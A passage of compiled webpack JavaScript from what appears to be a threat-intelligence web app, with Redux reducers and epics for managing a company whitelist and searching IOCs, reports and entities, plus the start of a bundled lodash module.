      return state.deleteIn(['items', payload.get('guid')]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["CLEAR_WHITELIST_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
    default:
      return state;
  }
};

var modalOpen = function modalOpen() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  return state;
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["FETCH_WHITELIST_PAGE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRY"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["DELETE_WHITELIST_ENTRY"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["CLEAR_WHITELIST"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["FETCH_WHITELIST_PAGE_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["FETCH_WHITELIST_PAGE_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRY_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRY_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRIES_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SAVE_WHITELIST_ENTRIES_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["DELETE_WHITELIST_ENTRY_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["DELETE_WHITELIST_ENTRY_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["CLEAR_WHITELIST_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["CLEAR_WHITELIST_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_PAGE_FILTERS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["RESET_PAGE_FILTERS"]:
      return false;
    default:
      return state;
  }
};

var currentQuery = function currentQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      field = action.field;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_PAGE_FILTERS"]:
      if (!field) {
        // Error message for now until better solution
        console.error('Error updating filter, missing field name or \'all\'');
        return state;
      }

      if (field && field.includes('.')) {
        // Nested fields separated by .
        var updatePath = field.split('.');
        return state.setIn(updatePath, payload);
      }
      if (field && field === 'query') {
        state = state.set('pageNumber', 0);
      }
      return state.set(field, payload.get(field));
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["RESET_PAGE_FILTERS"]:
      return __WEBPACK_IMPORTED_MODULE_2__getters__["defaultPayload"];
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  entries: entries,
  loading: loading,
  currentQuery: currentQuery,
  modalOpen: modalOpen
}));

/***/ }),
/* 3195 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__action_types__ = __webpack_require__(281);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__types__ = __webpack_require__(759);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__getters_js__ = __webpack_require__(758);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__utils_js__ = __webpack_require__(760);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__utils__ = __webpack_require__(760);














var WHITELIST_ENDPOINT = function WHITELIST_ENDPOINT(store) {
  return __WEBPACK_IMPORTED_MODULE_9__utils_js__["makeCompanyWhitelistEndpoint"](store);
};

var formatSearchRequest = function formatSearchRequest(payload) {
  var sort = payload.getIn(['sort', 'sort'], {});
  var params = {
    'sort': sort.sortBy + ',' + sort.sortDirection,
    'pageNumber': payload.get('pageNumber'),
    'pageSize': payload.get('pageSize')
  };
  return Object(__WEBPACK_IMPORTED_MODULE_3_querystring__["stringify"])(params);
};

var viewLoadedEpic = function viewLoadedEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('payload')).filter(function (x) {
    return x.pathname === '/settings/whitelist';
  }).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["FETCH_WHITELIST_PAGE"] }]);
  });
};

/* Fetches all whitelist entries and aliases */
var fetchWhitelistPageEpic = function fetchWhitelistPageEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["FETCH_WHITELIST_PAGE"], __WEBPACK_IMPORTED_MODULE_6__action_types__["UPDATE_PAGE_FILTERS"], __WEBPACK_IMPORTED_MODULE_6__action_types__["RESET_PAGE_FILTERS"]).mergeMap(function () {
    var currentQuery = __WEBPACK_IMPORTED_MODULE_8__getters_js__["currentQuery"](store.getState());
    return ajax.get(WHITELIST_ENDPOINT(store) + '?' + formatSearchRequest(currentQuery)).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (response) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types__["FETCH_WHITELIST_PAGE_SUCCESS"],
        payload: __WEBPACK_IMPORTED_MODULE_7__types__["WhitelistPage"](response)
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["FETCH_WHITELIST_PAGE_FAILURE"] });
    });
  });
};

/* Adds a new whitelist term and aliases */
var saveWhitelistEntryEpic = function saveWhitelistEntryEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRY"]).mergeMap(function (_ref3) {
    var payload = _ref3.payload;

    var encodedText = encodeURIComponent(payload.get('value'));
    var saveType = payload.get('guid') ? 'updated' : 'saved';
    var successMessage = 'The Whitelist term ' + payload.get('value') + ' was ' + saveType + ' successfully.';
    return ajax.post(WHITELIST_ENDPOINT(store) + '/add-term?text=' + encodedText).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (entry) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRY_SUCCESS"],
        payload: Object(__WEBPACK_IMPORTED_MODULE_11__utils__["normalizeWhitelistEntry"])(entry),
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the Whitelist term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRY_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Batch add new terms */
var saveWhitelistEntriesEpic = function saveWhitelistEntriesEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRIES"]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    var textArray = payload.toJS();
    var successMessage = 'The Whitelist terms were added successfully.';
    return ajax.postJSON(WHITELIST_ENDPOINT(store) + '/batch', textArray).map(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('response')).map(function (entries) {
      var entriesList = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(entries.map(function (d) {
        return Object(__WEBPACK_IMPORTED_MODULE_11__utils__["normalizeWhitelistEntry"])(d);
      }));
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRIES_SUCCESS"],
        payload: entriesList,
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      var serverError = Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["path"])(['xhr', 'response', 'message'], err);
      var message = serverError ? serverError : 'There was an error adding the whitelist term.';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRIES_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])(message)]);
    });
  });
};

/* Removes a whitelist term */
var deleteWhitelistEntryEpic = function deleteWhitelistEntryEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["DELETE_WHITELIST_ENTRY"]).mergeMap(function (_ref7) {
    var payload = _ref7.payload;

    // Encode the term in case it has special characters
    var value = encodeURIComponent(payload.get('value'));
    var type = payload.get('type');
    return ajax.delete(WHITELIST_ENDPOINT(store) + '/?type=' + type + '&value=' + value).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types__["DELETE_WHITELIST_ENTRY_SUCCESS"],
        payload: payload,
        meta: {
          alert: { type: 'success', text: 'The Company Whitelist term \'' + value + '\' of type \'' + type + '\' was deleted successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["DELETE_WHITELIST_ENTRY_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])('There was an error removing the Company Whitelist term ' + value + ' of type \'' + type + '\'.')]);
    });
  });
};

var clearWhitelistEpic = function clearWhitelistEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["CLEAR_WHITELIST"]).mergeMap(function (_ref9) {
    var payload = _ref9.payload;

    return ajax.delete(WHITELIST_ENDPOINT(store) + '/clear').map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types__["CLEAR_WHITELIST_SUCCESS"],
        payload: payload,
        meta: {
          alert: { type: 'success', text: 'The Company Whitelist terms were successfully cleared.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["CLEAR_WHITELIST_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions__["error"])('There was an error clearing the Company Whitelist.')]);
    });
  });
};

/* Refetch after any write operations */
var readAfterWriteEpic = function readAfterWriteEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRIES_SUCCESS"], __WEBPACK_IMPORTED_MODULE_6__action_types__["SAVE_WHITELIST_ENTRY_SUCCESS"], __WEBPACK_IMPORTED_MODULE_6__action_types__["DELETE_WHITELIST_ENTRY_SUCCESS"], __WEBPACK_IMPORTED_MODULE_6__action_types__["CLEAR_WHITELIST_SUCCESS"]).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types__["FETCH_WHITELIST_PAGE"] }]);
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(viewLoadedEpic, fetchWhitelistPageEpic, saveWhitelistEntryEpic, saveWhitelistEntriesEpic, deleteWhitelistEntryEpic, clearWhitelistEpic, readAfterWriteEpic));

/***/ }),
/* 3196 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isempty__ = __webpack_require__(3197);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isempty___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isempty__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__getters__ = __webpack_require__(557);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constants__ = __webpack_require__(761);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__reports_action_types__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__indicators_action_types__ = __webpack_require__(241);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__action_types_js__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__types__ = __webpack_require__(905);













var query = function query() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["b" /* CLEAR_REPORT_SEARCH_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["c" /* CLEAR_SEARCH_PAGE_FILTERS */]:
      return '';
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["f" /* EXECUTE_SEARCH */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["r" /* SET_SEARCH_TERM */]:
      return payload;
    default:
      return state;
  }
};

var panel = function panel() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'ALL';
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["s" /* SET_VIEW_PANEL */]:
      return payload;
    default:
      return state;
  }
};

/**
 * Like from JS but will handle converting the Set. Unfortunately I've found the
 * reviver function provided with fromJS to be extremely cumbersome to use.
 */
var fromOptions = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"], function (x) {
  return x.update('enclaveFilters', function (x) {
    return x ? Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])(x) : x;
  });
});

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_9__types__["a" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["q" /* SET_SEARCH_OPTIONS */]:
      return state.merge(fromOptions(payload).delete('page'));
    default:
      return state;
  }
};

var iocs = function iocs() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_9__types__["b" /* searchResponse */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["f" /* EXECUTE_SEARCH */]:
      return Object(__WEBPACK_IMPORTED_MODULE_9__types__["b" /* searchResponse */])();
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["g" /* FETCH_IOCS */]:
      return state.set('loading', true);
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["i" /* FETCH_IOCS_SUCCESS */]:
      return state.set('loading', false).merge(payload.delete('data')).set('data', state.get('data').concat(payload.get('data')));
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["h" /* FETCH_IOCS_FAILURE */]:
      return state.set('loading', false).set('error', true);
    default:
      return state;
  }
};

var reports = function reports() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_9__types__["b" /* searchResponse */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["f" /* EXECUTE_SEARCH */]:
      return Object(__WEBPACK_IMPORTED_MODULE_9__types__["b" /* searchResponse */])();
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["j" /* FETCH_REPORTS */]:
      return state.set('loading', true);
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["l" /* FETCH_REPORTS_SUCCESS */]:
      var currentReports = state.get('data');
      return state.set('loading', false).merge(payload.delete('data')).set('data', currentReports.concat(payload.get('data')));
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["k" /* FETCH_REPORTS_FAILURE */]:
      return state.set('loading', false).set('error', true);
    default:
      return state;
  }
};

// Search 2.0 Query Payloads, maybe make this it's own thing
var reportPageQueryRaw = function reportPageQueryRaw() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["defaultReportsSearchPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      fields = action.fields;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["v" /* UPDATE_REPORT_PAGE_FILTERS */]:
      if (!fields || __WEBPACK_IMPORTED_MODULE_3_lodash_isempty___default()(fields)) {
        // Error message for now until better solution
        console.error('Error updating report filter, missing field name or \'all\'');
        return state;
      }

      if (fields === __WEBPACK_IMPORTED_MODULE_5__constants__["UPDATE_ENTIRE_QUERY_OBJECT"]) {
        console.warn('Setting entire search payload');
        return payload;
      }

      var newState = state.concat([]);

      fields.forEach(function (field) {
        var path = field.split('.');
        newState = newState.setIn(path, payload.getIn(path));
      });

      return newState;
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["b" /* CLEAR_REPORT_SEARCH_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_4__getters__["defaultReportsSearchPayload"];
    case '@@redux-form/RESET':
      // Resetting search bar will clear query field
      var _ref = action.meta || {},
          _ref$form = _ref.form,
          form = _ref$form === undefined ? '' : _ref$form;

      return form === 'search' ? state.set('query', '') : state;
    default:
      return state;
  }
};

// Search Page Query payload is used just to show filter states and such, the actual filtering
// this payload is then converted to an ioc or report query object
// TODO: Lots of boilerplate on this page, action creators perhaps?
var searchPageQuery = function searchPageQuery() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["defaultReportsSearchPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      fields = action.fields;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["w" /* UPDATE_SEARCH_PAGE_FILTERS */]:
      if (!fields || __WEBPACK_IMPORTED_MODULE_3_lodash_isempty___default()(fields)) {
        // Error message for now until better solution
        console.error('Error updating report filter, missing field name or \'all\'');
        return state;
      }

      if (fields === __WEBPACK_IMPORTED_MODULE_5__constants__["UPDATE_ENTIRE_QUERY_OBJECT"]) {
        console.warn('Setting entire search payload');
        return payload;
      }

      var newState = state.concat([]);

      fields.forEach(function (field) {
        var path = field.split('.');
        newState = newState.setIn(path, payload.getIn(path));
      });

      return newState;
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["c" /* CLEAR_SEARCH_PAGE_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_4__getters__["defaultReportsSearchPayload"];
    case '@@redux-form/RESET':
      // Resetting search bar will clear query field
      var _ref2 = action.meta || {},
          _ref2$form = _ref2.form,
          form = _ref2$form === undefined ? '' : _ref2$form;

      return form === 'search' ? state.set('query', '') : state;
    default:
      return state;
  }
};

var searchResults = function searchResults() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["defaultSearchResults"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["n" /* SEARCH_ENTITIES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["p" /* SEARCH_REPORTS_SUCCESS */]:
      var searchType = payload.get('searchType');
      return state.set(searchType, payload);
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["m" /* SEARCH_ENTITIES_FAILURE */]:
      return state.set('entities', __WEBPACK_IMPORTED_MODULE_4__getters__["defaultEntityResult"]);
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["b" /* CLEAR_REPORT_SEARCH_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["o" /* SEARCH_REPORTS_FAILURE */]:
      return state.set('reports', __WEBPACK_IMPORTED_MODULE_4__getters__["defaultReportResult"]);
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["D" /* REMOVE_SUCCESS */]:
      var reportToRemoveGuid = payload;
      return state.updateIn(['reports', 'items'], function (items) {
        return items.filter(function (report) {
          return report.get('guid') !== reportToRemoveGuid;
        });
      });
    default:
      return state;
  }
};

var entityPageQueryRaw = function entityPageQueryRaw() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_4__getters__["defaultEntitiesSearchPayload"];
  var action = arguments[1];
  var type = action.type,
      payload = action.payload,
      fields = action.fields;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["u" /* UPDATE_ENTITY_PAGE_FILTERS */]:
      if (!fields || __WEBPACK_IMPORTED_MODULE_3_lodash_isempty___default()(fields)) {
        // Error message for now until better solution
        console.error('Error updating entity filter, missing field name or \'all\'');
        return state;
      }

      if (fields === __WEBPACK_IMPORTED_MODULE_5__constants__["UPDATE_ENTIRE_QUERY_OBJECT"]) {
        console.warn('Setting entire search payload');
        return payload;
      }

      var newState = state.concat([]);

      fields.forEach(function (field) {
        var path = field.split('.');
        newState = newState.setIn(path, payload.getIn(path));
      });

      return newState;
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */]:
      return __WEBPACK_IMPORTED_MODULE_4__getters__["defaultEntitiesSearchPayload"];
    case '@@redux-form/RESET':
      // Resetting search bar will clear query field
      var _ref3 = action.meta || {},
          _ref3$form = _ref3.form,
          form = _ref3$form === undefined ? '' : _ref3$form;

      return form === 'search' ? state.set('query', '') : state;
    default:
      return state;
  }
};

var loadingMetadata = function loadingMetadata() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["m" /* FETCH_METADATA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["l" /* FETCH_METADATA_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_7__indicators_action_types__["r" /* FETCH_INDICATOR_METADATA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_7__indicators_action_types__["q" /* FETCH_INDICATOR_METADATA_FAILURE */]:
      return false;
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["k" /* FETCH_METADATA */]:
    case __WEBPACK_IMPORTED_MODULE_7__indicators_action_types__["p" /* FETCH_INDICATOR_METADATA */]:
      return true;
    default:
      return state;
  }
};

var reportsLoadingAllData = function reportsLoadingAllData() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["p" /* SEARCH_REPORTS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["o" /* SEARCH_REPORTS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["g" /* FETCH_DATA_ALREADY_CACHED */]:
      return false;
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["e" /* EXECUTE_REPORTS_SEARCH */]:
      return true;
    default:
      return state;
  }
};

var entitiesLoadingAllData = function entitiesLoadingAllData() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["n" /* SEARCH_ENTITIES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["m" /* SEARCH_ENTITIES_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_6__reports_action_types__["g" /* FETCH_DATA_ALREADY_CACHED */]:
      return false;
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["d" /* EXECUTE_ENTITIES_SEARCH */]:
      return true;
    default:
      return state;
  }
};

var currentViewPanel = function currentViewPanel() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'ENTITIES';
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["s" /* SET_VIEW_PANEL */]:
      return payload;
    default:
      return state;
  }
};

var searchPayloadHasBeenInitialized = function searchPayloadHasBeenInitialized() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["w" /* UPDATE_SEARCH_PAGE_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["u" /* UPDATE_ENTITY_PAGE_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_8__action_types_js__["v" /* UPDATE_REPORT_PAGE_FILTERS */]:
      return true;
    default:
      return state;
  }
};

// End Search 2.0

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  query: query,
  options: options,
  iocs: iocs,
  reports: reports,
  reportPageQueryRaw: reportPageQueryRaw,
  searchResults: searchResults,
  reportsLoadingAllData: reportsLoadingAllData,
  entityPageQueryRaw: entityPageQueryRaw,
  entitiesLoadingAllData: entitiesLoadingAllData,
  currentViewPanel: currentViewPanel,
  searchPageQuery: searchPageQuery,
  searchPayloadHasBeenInitialized: searchPayloadHasBeenInitialized,
  loadingMetadata: loadingMetadata
}));

/***/ }),
/* 3197 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(global, module) {/**
 * lodash (Custom Build) <https://lodash.com/>
 * Build: `lodash modularize exports="npm" -o ./`
 * Copyright jQuery Foundation and other contributors <https://jquery.org/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */

/** Used as references for various `Number` constants. */
var MAX_SAFE_INTEGER = 9007199254740991;

/** `Object#toString` result references. */
var argsTag = '[object Arguments]',
    funcTag = '[object Function]',
    genTag = '[object GeneratorFunction]',
    mapTag = '[object Map]',
    objectTag = '[object Object]',
    promiseTag = '[object Promise]',
    setTag = '[object Set]',
    weakMapTag = '[object WeakMap]';

var dataViewTag = '[object DataView]';

/**
 * Used to match `RegExp`
 * [syntax characters](http://ecma-international.org/ecma-262/7.0/#sec-patterns).
 */
var reRegExpChar = /[\\^$.*+?()[\]{}|]/g;

/** Used to detect host constructors (Safari). */
var reIsHostCtor = /^\[object .+?Constructor\]$/;

/** Detect free variable `global` from Node.js. */
var freeGlobal = typeof global == 'object' && global && global.Object === Object && global;

/** Detect free variable `self`. */
